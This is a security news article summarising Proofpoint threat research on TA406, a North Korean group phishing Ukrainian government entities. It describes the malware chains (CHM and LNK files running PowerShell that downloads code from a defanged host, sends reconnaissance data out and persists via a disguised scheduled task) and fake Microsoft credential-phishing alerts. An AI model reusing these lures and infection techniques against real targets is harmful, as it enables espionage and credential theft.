SecurityBrief Asia - Technology news for CISOs & cybersecurity decision-makers
Asia
Guides
#
cloud security
#
cybersecurity
#
endpoint protection
#
firewalls
#
ransomware
Search
Story image
#
Malware
#
Cybersecurity
#
Proofpoint

North Korean hackers step up phishing attacks on Ukraine government

Today
Author image
By Sean Mitchell, Publisher

Proofpoint has published new threat intelligence regarding TA406, a Democratic People's Republic of Korea (DPRK) state-sponsored cyber actor that has begun targeting Ukrainian government bodies.

TA406, identified by other firms as Opal Sleet and Konni, shifted its focus in February 2025 to Ukrainian entities with phishing attacks containing both credential-stealing and malware components.

According to Proofpoint, these operations appear designed to collect strategic intelligence concerning the ongoing Russian invasion of Ukraine, with the likely intention of informing North Korean leadership about the conflict and risks to its personnel.

"In February 2025, TA406 began targeting government entities in Ukraine, delivering both credential harvesting and malware in its phishing campaigns. The aim of these campaigns is likely to collect intelligence on the trajectory of the Russian invasion," stated the research.

The group's tactics in recent campaigns included sending emails that posed as staff from think tanks, with the content tailored to recent developments in Ukrainian politics to entice engagement. Emails were found to have impersonated a fictitious senior fellow from a non-existent organisation, the Royal Institute of Strategic Studies.

Recipients were asked to download reports via links to external file hosting services. These links provided access to password-protected archives containing malicious files, including HTML and CHM files with embedded PowerShell scripts. Once executed, these scripts carried out extensive reconnaissance on the targeted system.

Describing the infection chain from one such campaign, Proofpoint stated: "The file Analytical Report.rar drops a CHM file of the same name when decrypted. The CHM file contains multiple HTML files that displays lure content related to former Ukrainian military leader Valeriy Zaluzhnyi. PowerShell in the HTML executes if a user clicks within the page; this initiates a GET request to hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt to download further PowerShell and execute it."

The subsequent PowerShell scripts collected a variety of system information, such as network configuration and details of installed antivirus software. The data was then Base64 encoded and transmitted via a POST request to a command-and-control server controlled by TA406.

"The PowerShell then uses similar scripting logic from the initial HTML file and saves it to a file named state.bat in the host's APPDATA folder. The batch file is then installed as an autorun file for persistence and runs upon machine start up," Proofpoint reported.

TA406 also used alternative forms of malware delivery. In some cases, the first-stage payload was delivered as an HTML attachment. When the recipient followed the embedded link, a ZIP archive was downloaded, containing both a benign PDF and a malicious LNK shortcut file. Proofpoint described: "The decoded LNK command contains further Base64-encoded PowerShell, which initiates a scheduled task named Windows Themes Update." This process dropped a Javascript Encoded file that was run by the scheduled task, checking in with a TA406-controlled server for further instructions.

Prior to these malware campaigns, Proofpoint documented credential harvesting efforts by TA406. The group sent fake Microsoft security alerts to Ukrainian government addresses from Proton Mail accounts, tricking recipients into visiting malicious websites where login credentials could be stolen.

Proofpoint noted: "Prior to TA406's malware delivery campaigns, Proofpoint also observed TA406 attempt to gather credentials by sending fake Microsoft security alert messages to Ukrainian government entities from Proton Mail accounts. The messages claim the target's account had unusual sign-in activity from various IP addresses, and request the target verify the login attempt via a link to the compromised domain jetmf[.]com." The same domain had previously been used for credential phishing against Naver accounts in past TA406 campaigns.

Attribution of every observed operation to TA406 could not be confirmed with full certainty. However, technical overlap and victimology support the conclusion these activities are linked to the group's ongoing focus on strategic, political intelligence collection, rather than tactical battlefield data, which is usually the remit of Russian threat actors.

"Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict. North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments. Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts," the research concluded.

Follow us on:
Follow us on LinkedIn Follow us on X
Share on:
Share on LinkedIn Share on X
Related stories
Hackers target FTP servers with weak passwords, study finds
Andy Frain notifies 100,000 after major ransomware breach
Bruteforce cyber attacks surge in SEA, over 53 million blocked
Ransomware surge sees hackers demand up to USD $8.6 million
Australian firms lag in preparation for quantum computing threat
Top stories
How businesses are fighting sophisticated cyber threats with AI
SenTRACK 2.0 launches to deliver adaptive AI surveillance
May’s Patch Tuesday revealed 77 vulnerabilities
Cyberattacks surge amid India-Pakistan clashes after strikes
Datadog names Yadi Narayana CTO for Asia-Pacific & Japan